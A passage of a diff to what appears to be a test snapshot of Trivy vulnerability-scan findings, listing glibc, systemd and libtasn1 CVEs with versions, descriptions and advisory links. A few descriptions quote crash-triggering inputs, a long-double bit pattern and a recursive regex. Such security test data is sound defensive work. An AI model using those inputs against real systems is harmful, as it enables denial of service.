"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-10029", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-10029", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], "severity": "MEDIUM", @@ -134113,62 +135252,52 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", - }, - { - "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", - }, - { - "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", @@ -134176,6241 +135305,6238 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "4.16.0-2+deb11u1", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", + }, + { + "type": "URL", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + }, + { + "type": "URL", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": 